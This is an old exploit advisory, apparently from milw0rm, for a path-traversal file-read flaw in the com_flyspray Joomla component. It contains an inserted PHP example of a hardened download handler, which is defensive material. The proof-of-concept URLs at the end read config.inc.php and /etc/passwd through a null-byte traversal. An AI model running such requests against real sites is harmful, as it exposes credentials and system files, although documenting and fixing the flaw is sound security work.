_____ __ __ __ ___
| __ \ | \/ | \ \ / (_)
| | | |_ __ | \ / | __ ___ __ \ \ / / _ _ __ _ _ ___
| | | | '__| | |\/| |/ _` \ \/ / \ \/ / | | '__| | | / __|
| |__| | | | | | | (_| |> < \ / | | | | |_| \__ \
|_____/|_| |_| |_|\__,_/_/\_\ \/ |_|_| \__,_|___/
*****************************************************************************************************************************
Component name: com_flyspray
Affected version: 1.0.1
Download page: http://mamboxchange.com/frs/download.php/8304/com_flyspray_1.0.1.zip
*****************************************************************************************************************************
Author: Dr Max Virus
Location: Egypt
*****************************************************************************************************************************
Bug in: startdown.php
Vulnerable code:
In line 52:
readfile($file);
Problem: The file variable comes straight from the request and is passed to readfile() without any sanitization, so any file readable by the web server can be retrieved, including the config file.
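The following is an added example of how the download handler could be hardened against the unsanitized readfile($file) pattern described above; it is not the com_flyspray code and not part of the original advisory. It assumes attachments live only under a fixed directory (/var/www/joomla/attachments is a placeholder) and PHP 7 or later.

```php
<?php
// Added example, not the component's own code: serve a file from a fixed
// directory, taking only a bare file name from the request, never a path.
// Assumption: legitimate attachments live only under $baseDir.
function serve_attachment(string $requested, string $baseDir): bool
{
    // Reject embedded NUL bytes outright (old PHP truncated paths at %00).
    if (strpos($requested, "\0") !== false) {
        return false;
    }
    // Keep only the final path component: no separators, no traversal.
    $name = basename($requested);
    if ($name === '' || $name === '.' || $name === '..') {
        return false;
    }
    // Allow-list the name itself; adjust the pattern to the site's needs.
    if (!preg_match('/^[A-Za-z0-9._-]+$/', $name)) {
        return false;
    }
    // realpath() resolves symlinks; confirm the result is still inside $base.
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $full === false
        || strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    if (!is_file($full) || !is_readable($full)) {
        return false;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . $name . '"');
    header('Content-Length: ' . filesize($full));
    readfile($full);
    return true;
}

// Usage: a request for config.inc.php or ../../etc/passwd fails every check
// above unless a file of exactly that base name exists in the attachment dir.
$ok = serve_attachment((string)($_GET['file'] ?? ''), '/var/www/joomla/attachments');
if (!$ok) {
    http_response_code(404);
    echo 'File not found';
}
```

Files the application itself needs, such as config.inc.php, should never be placed in the attachment directory, since the allow-list only constrains the name, not the purpose of the file.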
*****************************************************************************************************************************
POC:
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=config.inc.php
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00
*****************************************************************************************************************************
Thx to: str0ke & Nukedx & Thehacker & all my friends
Special Gr33Ts: ASIANEAGLE & The Master & Kacper
****************************************************************************************************************************
# milw0rm.com [2006-11-26]